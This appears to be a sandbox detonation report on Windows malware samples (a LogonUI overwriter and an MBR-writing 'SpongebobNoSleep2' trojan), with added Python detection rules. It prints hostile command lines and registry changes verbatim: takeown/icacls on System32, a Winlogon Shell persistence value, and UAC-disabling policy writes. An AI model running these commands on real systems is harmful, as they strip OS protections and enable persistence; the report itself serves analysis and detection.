"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Form1.vbs"

Network

N/A

Files

N/A

Analysis: behavioral27

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win7-20240221-en

Max time kernel

120s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\bin\Debug\Logon_overwriter.exe"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\LogonUI.exe C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\bin\Debug\Logon_overwriter.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\bin\Debug\Logon_overwriter.exe

"C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\bin\Debug\Logon_overwriter.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32 /grant "Admin:F"
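
The three Logon_overwriter detonations (behavioral28, behavioral30 and this one, behavioral27) show one chain: cmd.exe /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F", then the executable opens C:\Windows\System32\LogonUI.exe for modification. Two details matter for detection: cmd expands %username% before icacls starts, so the icacls child shows Admin:F while the parent line still carries the literal %username%; and taking ownership of System32 needs SeTakeOwnershipPrivilege, which takeown.exe is shown enabling and which the UAC-filtered token does not carry, so the chain only works from an already elevated process and weakens the System32 ACL rather than escalating by itself. The block below is an added example, not part of this report or of the sample, of a check over process-creation and file events that flags those rows. The events are constructed from the process tree and file signature above (PIDs are invented; the report gives none for these runs); the protected-path list, the servicing-image exemptions and the field and rule names are the example's own assumptions.

```python
import re
from dataclasses import dataclass

# Directories whose owner or DACL an ordinary process should never rewrite.
# This list is an assumption of the example; the report only shows System32.
PROTECTED_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows")
# System binaries whose write-open is an alert on its own (LogonUI.exe is the one
# this report shows being opened for modification).
PROTECTED_FILES = (r"c:\windows\system32\logonui.exe",)
# Images allowed to touch those files (assumption: normal Windows servicing).
SERVICING_IMAGES = ("\\trustedinstaller.exe", "\\tiworker.exe", "\\msiexec.exe")

TAKEOWN_RE = re.compile(r'\btakeown(?:\.exe)?\b[^&|]*?/f\s+"?([^"\s]+)', re.I)
ICACLS_RE = re.compile(r'\bicacls(?:\.exe)?\s+"?([^"\s]+)"?([^&|]*)', re.I)
GRANT_RE = re.compile(r'/grant(?::r)?\s+"?([^"\s:]+):([^"\s]+)', re.I)


@dataclass
class Finding:
    rule: str
    pid: int
    path: str
    detail: str = ""


def norm(path: str) -> str:
    return path.strip('"').rstrip("\\").lower()


def is_protected(path: str) -> bool:
    p = norm(path)
    return any(p == d or p.startswith(d + "\\") for d in PROTECTED_DIRS)


def check_process(ev: dict) -> list[Finding]:
    """Flag takeown / icacls against a protected path anywhere in one command line.
    The cmd.exe /k line in this report carries both commands, so it yields two
    findings on its own; the takeown.exe and icacls.exe children yield one each."""
    out, cmd = [], ev["cmdline"]
    for m in TAKEOWN_RE.finditer(cmd):
        if is_protected(m.group(1)):
            out.append(Finding("takeown_protected_path", ev["pid"], m.group(1)))
    for m in ICACLS_RE.finditer(cmd):
        target, rest = m.group(1), m.group(2)
        if not is_protected(target):
            continue
        for g in GRANT_RE.finditer(rest):
            principal, rights = g.group(1), g.group(2)
            # Drop inheritance flags such as (OI)(CI) before looking for F / M / W.
            simple = re.sub(r"\([^)]*\)", "", rights).upper()
            if any(r in simple for r in ("F", "M", "W")):
                out.append(Finding("icacls_grant_write_protected_path", ev["pid"],
                                   target, f"{principal}:{rights}"))
    return out


def check_file(ev: dict) -> list[Finding]:
    """Flag a write-open of a protected binary by anything but a servicing process."""
    if ev["op"] != "open_for_modification" or norm(ev["path"]) not in PROTECTED_FILES:
        return []
    if ev["image"].lower().endswith(SERVICING_IMAGES):
        return []
    return [Finding("protected_binary_modified", ev["pid"], ev["path"], ev["image"])]


def scan(events: list[dict]) -> list[Finding]:
    findings = []
    for ev in events:
        if ev["type"] == "process":
            findings += check_process(ev)
        elif ev["type"] == "file":
            findings += check_file(ev)
    return findings


# Constructed events, copied from the process tree and file signature above.
# The PIDs are invented; the report does not give them for this detonation.
LO = r"C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\bin\Debug\Logon_overwriter.exe"
SAMPLE_EVENTS = [
    {"type": "process", "pid": 100, "ppid": 1, "image": LO, "cmdline": f'"{LO}"'},
    {"type": "process", "pid": 101, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F"'},
    {"type": "process", "pid": 102, "ppid": 101, "image": r"C:\Windows\system32\takeown.exe",
     "cmdline": r"takeown /f C:\Windows\System32"},
    {"type": "process", "pid": 103, "ppid": 101, "image": r"C:\Windows\system32\icacls.exe",
     "cmdline": r'icacls C:\Windows\System32 /grant "Admin:F"'},
    {"type": "file", "pid": 100, "image": LO,
     "op": "open_for_modification", "path": r"C:\Windows\System32\LogonUI.exe"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f)
```

Matching on the principal is deliberately avoided: a rule keyed on the literal Admin:F would fire on the icacls child but miss the parent cmd.exe line, which is the one that also names takeown.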

Network

N/A

Files

memory/1040-0-0x0000000000940000-0x000000000094E000-memory.dmp

memory/1040-1-0x000007FEF5A10000-0x000007FEF63FC000-memory.dmp

memory/1040-2-0x00000000004B0000-0x0000000000530000-memory.dmp

memory/1040-4-0x000007FEF5A10000-0x000007FEF63FC000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win7-20240215-en

Max time kernel

147s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep2.exe"

Signatures

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, wscript.exe \"C:\\windows\\winbase_base_procid_none\\secureloc0x65\\WinRapistI386.vbs\"" C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A

Disables Task Manager via registry modification

evasion

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\145B.tmp\mbr.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp" C:\Windows\system32\reg.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification \??\c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe C:\Windows\system32\cmd.exe N/A
File created \??\c:\windows\winbase_base_procid_none\secureloc0x65\mainbgtheme.wav C:\Windows\system32\cmd.exe N/A
File opened for modification \??\c:\windows\winbase_base_procid_none\secureloc0x65\mainbgtheme.wav C:\Windows\system32\cmd.exe N/A
File created \??\c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Cursors\Arrow = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Cursors\Hand = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
(this row is reported 64 times for gdifuncs.exe; the identical repeats are collapsed here)

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\MainWindow.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2212 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep2.exe C:\Windows\system32\wscript.exe
PID 1048 wrote to memory of 712 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\145B.tmp\mbr.exe
PID 1048 wrote to memory of 924 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 924 wrote to memory of 1388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 924 wrote to memory of 1756, 1864, 860, 564, 2244, 828, 1868, 1260, 2424, 648, 2520, 1012, 452, 1064, 2492, 1708, 2152 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
(each parent-to-child write above is reported three or four times in the raw log; the identical repeats are collapsed here)

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
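
The signatures above for behavioral1 are all registry or raw-device writes: Winlogon\Shell gains a second entry that runs a .vbs through wscript.exe, ConsentPromptBehaviorAdmin is set to 0 so elevation no longer prompts, DisableRegistryTools is set to 1, and mbr.exe opens \??\PhysicalDrive0 for writing. Note that the Shell value landed in the Wow6432Node view because gdifuncs.exe runs 32-bit; on a 64-bit host it is worth confirming that the 64-bit Winlogon honours that view before treating the persistence as effective, and a detection should fire on either view. The block below is an added example, not from this report or the sample, of a check over registry-set and file-open events that flags exactly those changes. The events are constructed from the indicator rows above. As a generalization beyond the page it also checks Winlogon\Userinit and EnableLUA, accepts the \\.\PhysicalDriveN spelling of the device path, and checks the DisableTaskMgr value (the report names the Task Manager signature but shows no indicator row, so that value name is an assumption). Field and rule names are the example's own.

```python
import re
from dataclasses import dataclass


@dataclass
class Alert:
    rule: str
    severity: str
    key: str
    detail: object
    process: str


# "\REGISTRY\MACHINE\" and "\REGISTRY\USER\<SID>\" are stripped so that HKLM and
# per-user policy keys compare on the same suffix; the Wow6432Node redirection is
# folded too, so the 32-bit and 64-bit views of one policy hit the same rule.
HIVE_RE = re.compile(r"^\\REGISTRY\\(?:MACHINE|USER\\S-1-5-[\d-]+(?:_Classes)?)\\", re.I)
RAW_DISK_RE = re.compile(r"^(?:\\\?\?\\|\\\\\.\\)PhysicalDrive\d+$", re.I)

WINLOGON = "software\\microsoft\\windows nt\\currentversion\\winlogon\\"
POLICY_SYSTEM = "software\\microsoft\\windows\\currentversion\\policies\\system\\"
# Stock values of the two Winlogon entries (assumption: a default Windows install).
DEFAULTS = {"shell": ["explorer.exe"], "userinit": ["c:\\windows\\system32\\userinit.exe"]}


def norm_key(path: str) -> str:
    p = HIVE_RE.sub("", path).lower()
    wow = "software\\wow6432node\\"
    return "software\\" + p[len(wow):] if p.startswith(wow) else p


def split_list(val) -> list[str]:
    # Shell and Userinit are comma-separated lists; a trailing comma is normal.
    return [e.strip() for e in str(val).split(",") if e.strip()]


def check_registry(ev: dict) -> list[Alert]:
    key, val, proc = norm_key(ev["key"]), ev["value"], ev["process"]
    name = key.rsplit("\\", 1)[-1]
    if key.startswith(WINLOGON) and name in DEFAULTS:
        entries = split_list(val)
        if [e.lower() for e in entries] != DEFAULTS[name]:
            extra = [e for e in entries if e.lower() not in DEFAULTS[name]]
            return [Alert(f"winlogon_{name}_hijack", "high", key, extra, proc)]
        return []
    if key.startswith(POLICY_SYSTEM):
        try:
            n = int(val)
        except (TypeError, ValueError):
            return []
        if name == "consentpromptbehavioradmin" and n == 0:
            return [Alert("uac_admin_prompt_disabled", "high", key, n, proc)]
        if name == "enablelua" and n == 0:
            return [Alert("uac_disabled", "high", key, n, proc)]
        if name in ("disableregistrytools", "disabletaskmgr") and n == 1:
            return [Alert("admin_tool_disabled", "medium", key, name, proc)]
    return []


def check_file(ev: dict) -> list[Alert]:
    # A write-open of the raw disk device is the MBR/bootkit signature in this report.
    if ev["op"] == "open_for_modification" and RAW_DISK_RE.match(ev["path"]):
        return [Alert("raw_disk_write_open", "critical", ev["path"], None, ev["process"])]
    return []


def scan(events: list[dict]) -> list[Alert]:
    out = []
    for ev in events:
        if ev["type"] == "registry":
            out += check_registry(ev)
        elif ev["type"] == "file":
            out += check_file(ev)
    return out


# Constructed events, copied from the indicator rows for this detonation.
GDI = r"C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe"
USER_HIVE = "\\REGISTRY\\USER\\S-1-5-21-2248906074-2862704502-246302768-1000"
SAMPLE_EVENTS = [
    {"type": "registry", "process": GDI,
     "key": r"\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell",
     "value": 'explorer.exe, wscript.exe "C:\\windows\\winbase_base_procid_none\\secureloc0x65\\WinRapistI386.vbs"'},
    {"type": "registry", "process": GDI,
     "key": r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin",
     "value": "0"},
    {"type": "registry", "process": GDI,
     "key": USER_HIVE + r"\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",
     "value": "1"},
    # The wallpaper change is noise for these rules and must not fire.
    {"type": "registry", "process": r"C:\Windows\system32\reg.exe",
     "key": USER_HIVE + r"\Control Panel\Desktop\Wallpaper", "value": r"c:\bg.bmp"},
    {"type": "file", "process": r"C:\Users\Admin\AppData\Local\Temp\145B.tmp\mbr.exe",
     "op": "open_for_modification", "path": r"\??\PhysicalDrive0"},
]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(a)
```

The Shell rule reports the extra entries rather than the whole value, so the .vbs path that Winlogon would launch at every logon is what reaches the analyst.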

Processes

C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep2.exe

"C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep2.exe"

C:\Windows\system32\wscript.exe

"C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\145B.tmp\145C.tmp\145D.vbs //Nologo

C:\Users\Admin\AppData\Local\Temp\145B.tmp\mbr.exe

"C:\Users\Admin\AppData\Local\Temp\145B.tmp\mbr.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\145B.tmp\tools.cmd" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f

C:\Windows\system32\rundll32.exe (35 identical instances, collapsed here)

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Users\Admin\AppData\Local\Temp\145B.tmp\MainWindow.exe

"C:\Users\Admin\AppData\Local\Temp\145B.tmp\MainWindow.exe"

C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe

"C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe"

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\145B.tmp\145C.tmp\145D.vbs

MD5 b893c34dd666c3c4acef2e2974834a10
SHA1 2664e328e76c324fd53fb9f9cb64c24308472e82
SHA256 984a07d5e914ed0b2487b5f6035d6e8d97a40c23fa847d5fbf87209fee4c4bbc
SHA512 98a3413117e27c02c35322e17c83f529955b83e72f2af7caaaff53099b583cd241cec95e70c3c0d6d440cb22cf0109d4e46dfda09ef2480427e9a9ab7a4c866b

C:\Users\Admin\Desktop\SPONGEBOB_IS_WATCHING_YOU 5.txt

MD5 bb6d68d7181108015cd381c28360dfc4
SHA1 192c34b9cba6f9c4b742f2b70d9731b8ba2ac764
SHA256 aea8fb9235900760ac374c6a4a10fba62c2a0ef5bea2dd7ef4db70fe55e0b317
SHA512 e3d6bf8f6ae16daa235e2bc7ce64da5a76ff0155fa89942a4e9d3f10ce70229e081c5029a6b67702a6b14000f62e6c9188ba394ee7183d0667ddac9e0224f3f3

C:\Users\Admin\AppData\Local\Temp\145B.tmp\mbr.exe

MD5 b25dfa10da59f8870bfd2881424387a7
SHA1 cdd1905c01727aa0bd13dc0c2ce99e7dfb90c7c3
SHA256 07d0d55d8135b4134f359fb95066e69237ae18f78ce0348419770df44c1291e0
SHA512 d476eab8ea65e6681b4efa5de82786e5cc6a221ab068d499a90963b5de51d1284694ed119d61a903a1f19a49bf0286228d3c54eeb38fe2e5fab6b7d548331d1d

C:\Users\Admin\AppData\Local\Temp\145B.tmp\mbr.exe

MD5 26ed4ff75a36f8e4eadac07f4a05b191
SHA1 2dd3b522c895abd247c6aff056c03679aac674b8
SHA256 386bfc26cd02d4444970c8cc43c9b8016a414f24f043e3059301977a046f8af5
SHA512 6a315b30f834843d57059a9c9c4c1d8d33ef2d7851da140677f0c15ed430b6b4b0a50063ab1c7d374ecc4a07b0f4a720ca7793513468e752daa89fb62d2cb9a4

C:\Users\Admin\AppData\Local\Temp\145B.tmp\tools.cmd

MD5 397c1a185b596e4d6a4a36c4bdcbd3b2
SHA1 054819dae87cee9b1783b09940a52433b63f01ae
SHA256 56c7054c00a849648d3681d08536dc56c0fb637f1f1ec3f9e102eace0a796a9f
SHA512 c2a77479ca0aa945826dccea75d5a7224c85b7b415fda802301be8a2305197276a33c48f82717faddb2a0ac58300f5b849a8c0dffb5a4443663c3dfd951d4e5c

memory/712-221-0x0000000000400000-0x00000000004D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\145B.tmp\bg.bmp

MD5 34de1fb7af04ee0e74d7ebde80fe6595
SHA1 65cbfc43364a00e02814915ffe5e3f0968835b98
SHA256 b656ac1b28295c04e989215a88b592693e56d918f1125f835441a47276fcb476
SHA512 2532277795ea0f107e2784ee5d601a0d34eb869d6102759a0ca20c92391e430f6ee396481f6c81998afe5c4acc2dcd54bc77fe12bd5239d069a76a1e81e0600d

C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe

MD5 e254e9598ee638c01e5ccc40e604938b
SHA1 541fa2a47f3caaae6aa8f5fbfe4d8aef0001905d
SHA256 4040ad3437e51139819148ed6378828adcfbd924251af39de8bf100a3a476a63
SHA512 92f129a52f2df1f8ed20156e838b79a13baf0cbcdd9c94a5c34f6639c714311f41eb3745fdcc64eac88ce3e6f27d25f9a3250f4ababc630eff7a89802e18b4bb

C:\Users\Admin\AppData\Local\Temp\145B.tmp\mainbgtheme.wav

MD5 97e96db54c2c9def65e44613624e3ac1
SHA1 ead3b0fe0b9fc5a065271614ecf852be6159a8e8
SHA256 55422beb49541390508cd2fde7dcf052ad168ef3de4bc38b22e2ed458d2f23a6
SHA512 b16136f1493e1ef6e35993d9db514812297c564af2fb1c5e3fe05f47c24a3d6e9fbcb1785936f83db55fdac1515bd6d8bfaed311541b8d12c3e884eb67449f01

\??\c:\bg.bmp

MD5 ce45a70d3cc2941a147c09264fc1cda5
SHA1 44cdf6c6a9ab62766b47caed1a6f832a86ecb6f9
SHA256 eceedadfde8506a73650cfa9a936e6a8fff7ffb664c9602bb14432aa2f8109ac
SHA512 d1bf6cdade55e9a7ce4243e41a696ae051835711f3d1e0f273ad3643f0b878266a8213cc13ca887a8181981ba4937350986e01e819b4bb109330718ef6251149

C:\Users\Admin\AppData\Local\Temp\145B.tmp\MainWindow.exe

MD5 7c92316762d584133b9cabf31ab6709b
SHA1 7ad040508cef1c0fa5edf45812b7b9cd16259474
SHA256 01995c3715c30c0c292752448516b94485db51035c3a4f86eb18c147f10b6298
SHA512 f9fc7600c30cb11079185841fb15ee3ba5c33fff13979d5e69b2bae5723a0404177195d2e0bd28142356ff9b293850880b28322b2ce1ff9fe35e8961bb3f7be1

memory/1580-240-0x0000000000850000-0x0000000000872000-memory.dmp

memory/1580-241-0x0000000074590000-0x0000000074C7E000-memory.dmp

memory/1580-242-0x00000000048A0000-0x00000000048E0000-memory.dmp

memory/1580-243-0x00000000048A0000-0x00000000048E0000-memory.dmp

C:\windows\winbase_base_procid_none\secureloc0x65\mainbgtheme.wav

MD5 1b185a156cfc1ddeff939bf62672516b
SHA1 fd8b803400036f42c8d20ae491e2f1f040a1aed5
SHA256 e147a3c7a333cbc90e1bf9c08955d191ce83f33542297121635c1d79ecfdfa36
SHA512 41b33930e3efe628dae39083ef616baaf6ceb46056a94ab21b4b67eec490b0442a4211eaab79fce1f75f40ecdc853d269c82b5c5389081102f11e0f2f6503ae7

Analysis: behavioral13

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win7-20240221-en

Max time kernel

119s

Max time network

124s

Command Line

"C:\Windows\hh.exe" "C:\Users\Admin\AppData\Local\Temp\source\Bat To Exe Converter\help.chm"

Signatures

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\hh.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\hh.exe N/A
N/A N/A C:\Windows\hh.exe N/A

Processes

C:\Windows\hh.exe

"C:\Windows\hh.exe" "C:\Users\Admin\AppData\Local\Temp\source\Bat To Exe Converter\help.chm"

Network

N/A

Files

memory/1712-17-0x000007FFFFF90000-0x000007FFFFFA0000-memory.dmp